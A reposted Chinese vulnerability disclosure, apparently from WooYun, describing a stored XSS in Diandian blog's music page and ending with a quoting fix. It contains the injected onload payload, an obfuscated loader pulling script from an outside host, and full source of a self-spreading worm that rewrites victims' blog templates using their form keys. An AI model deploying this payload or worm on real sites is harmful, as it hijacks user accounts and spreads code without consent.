点点网又一存储型Xss漏洞

2012-8-15 10:38:39 来源:网络转载 浏览:148
点点网又一漏洞公开:点点网存储型Xss。

简要描述:
点点网某处编程缺陷导致存储型Xss。

详细说明:
响应xsser的精神,分享就要写过程。

1. 点点网,在xxx.diandian.com域下是允许自定义JS内容的,但是没有formkey的话,无非进行写操作,从而无法进行传播。分析了下,目测,点点应该是只把formkey暴露到了www.diandian.com这个域下。 因而,我们需要寻找www.diandian.com域下的xss或者其它方式来获取formkey才能进行后续的传播操作。

2. 带着这个目的,得去找www.diandian.com域下的xss。 首先我还是想到的FLASH,不过google了下,www.diandian.com域下搜索不到flash文件。 只能自己找,但是我才刚用点点,对点点的功能都不熟悉,有点无从下手的感觉。

3. 还是打开google, 搜索 site:www.diandian.com -"tag" -"content" -"category" ... (屏蔽一些不可能存在XSS的关键词页面)。 看到一个页面
http://www.diandian.com/blog/fm/iframe/reggaesky
看了下页面源代码,可以看到左侧的tags是直接输出,而右侧的音乐专辑不在源码中,应该是.innerHTML方式输出。

点点网存储型Xss

4. 直觉告诉俺,这个页面可能会有问题。于是回到自己博客发了一篇音乐,然后单独对
http://www.diandian.com/blog/fm/iframe/wooyuntest (wooyuntest是俺测试帐号)这个页面进行分析。

5. 首先测试了标签位置,<, > 被过滤,没戏

点点网存储型Xss

6. 接着为了查看右侧是如何输出的,打开chrome的调试工具,搜索,cover-image,可以定位音乐专辑封面输出的相关JS文件,http://s.libdd.com/js/app/fm.$6765.js

点点网存储型Xss

7. 将这个JS的代码,复制到编辑器中。。显眼的语法高亮,让我眼前一亮。

点点网存储型Xss

8. 缺陷代码如下:
var b=a.data,c=b.albumCover||"";p=a.data,g(".music-info").fadeOut("100",function(){g(".cover-image").html("<img src='"+c+"'>")
这里src属性是用 ' 闭合的,如果src属性里允许输入',那么就将造成Xss。

9. 基于此,我们编辑之前发送的那篇音乐帖子。
POST http://www.diandian.com/edit/02c85840-c297-11e1-9a22-782bcb38253b
其它参数在此不表。将album_logo 参数修改为:
http://img.xiami.com/./images/album/img60/1260/66481314675280_1.jpg' onload='alert(document.domain)//
保存后,再打开http://www.diandian.com/blog/fm/iframe/wooyuntest
看来这里没有过滤 ' ,如我们所愿的弹出了 www.diandian.com

点点网存储型Xss

10. 接下来就是漏洞的利用。 调用外部JS, http://xsst.sinaapp.com/diandian.js
http://img.xiami.com/./images/album/img60/1260/66481314675280_1.jpg' onload='window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,100,105,97,110,100,105,97,110,46,106,115);document.body.appendChild(window.s)//

11. http://xsst.sinaapp.com/diandian.js 源码如下:

if(!window.__wooyun){
//load jq
 var _s=document.createElement("script");
 _s.onload=function(){
  getBlogInfo();
 }
 _s.src="http://xsst.sinaapp.com/jq.js";
 document.body.appendChild(_s);
 window.__wooyun=2;
}
String.prototype.getMatch=function(reg){
 return (this.match(reg)||["",""])[1];
};
function getBlogInfo(){
 $.get("http://www.diandian.com/wall",function(rs){
  var bid=rs.getMatch(/id="nav-blog-(\d+)"/);
  var bname=rs.getMatch(/http:\/\/www\.diandian\.com\/dianlog\/([^"]+)"/);
  //get theme , check if the worm code exists.
  getTheme(bid,bname);
 });
}
function getTheme(id,name){
 //check if the user use theme
 $.get("http://www.diandian.com/customize/"+name,function(info){
  var tid=info.getMatch(/usedThemeInfoId\s+=\s+(\d+)/);
  var callback=function(rs){
   if(rs.indexOf("__wooyun_worm")==-1){
    //if no worm then ..
    rs=rs.replace(/^\s+|\s+$/g,"");
    rs=rs||decodeURIComponent("");
    rs=rs.replace(/^\d+\|+/,"");
    rs=rs.replace(/<body([^>]*)>/,"<body$1><iframe src=\"http://www.diandian.com/blog/fm/iframe/wooyuntest\" style=\"display:none\" name=\"__wooyun_worm\"></iframe>");
    saveTheme(id,name,rs,tid);
   }
  };
  //default - use blogId
  var data={
   "formKey":DDformKey,
   "blogId":id
  };
  if(tid){
   //use theme id
   data={
    "formKey":DDformKey,
    "themeId":id
   };
  }
  $.post("http://www.diandian.com/n/customize/source",data,callback);
 });
}
function saveTheme(id,name,rs,tid){
 $.post("http://www.diandian.com/n/customize",{
  "formKey":DDformKey,
  "themeInfoId":tid||"0",
  "userParams":"{\"模板色系\":{\"paramType\":\"Color\",\"value\":\"#0F3D5E\",\"desc\":null},\"背景颜色\":{\"paramType\":\"Color\",\"value\":\"#ECEEF0\",\"desc\":null},\"显示标签云\":{\"paramType\":\"Boolean\",\"value\":false,\"desc\":null},\"每页文章数目\":{\"paramType\":\"Number\",\"value\":\"10\",\"desc\":null}}",
  "customCss":"",
  "blogName":name,
  "blogDesc":"",
  "html":rs||"<html><body><iframe src=\"http://www.diandian.com/blog/fm/iframe/wooyuntest\" style=\"display:none\" name=\"__wooyun_worm\"></iframe></body></iframe>",
  "blogId":id,
  "blogUrl":name
 },function(){
  try{
   console.log("worm ok...");
  }catch(e){

  }
 });
}

12. 源码说明:
A. 首先获取当前博客的个人信息,包括 blogId, blogName等
B. 然后用此ID获取当前用户的模版代码,进行判断,如果不包含__wooyun_worm字样,则进行感染操作。
C. 将用户原有的模版代码,插入 <iframe src="http://www.diandian.com/blog/fm/iframe/wooyuntest" style="display:none" name="__wooyun_worm"></iframe>

13. 在wooyuntest的模版代码中,插入 <iframe src="http://www.diandian.com/blog/fm/iframe/wooyuntest" style="display:none" name="__wooyun_worm"></iframe>

14. 当受害者访问 wooyuntest.diandian.com 时,其自己博客将会被感染。

漏洞证明:
测试环境:Win7, IE9, Chrome
漏洞测试效果:
使用另外一个用户gainover,访问wooyuntest.diandian.com后,博客模版被感染,使得 gainover.diandian.com同样带有攻击性。
被感染的受害者

点点网存储型Xss

修复方案:
因为你们对c里的双引号等都进行了转义,故将http://s.libdd.com/js/app/fm.$6765.js中的
g(".cover-image").html("<img src='"+c+"'>")
修改为
g(".cover-image").html("<img src=\""+c+"\">")即可。

(0)
(0)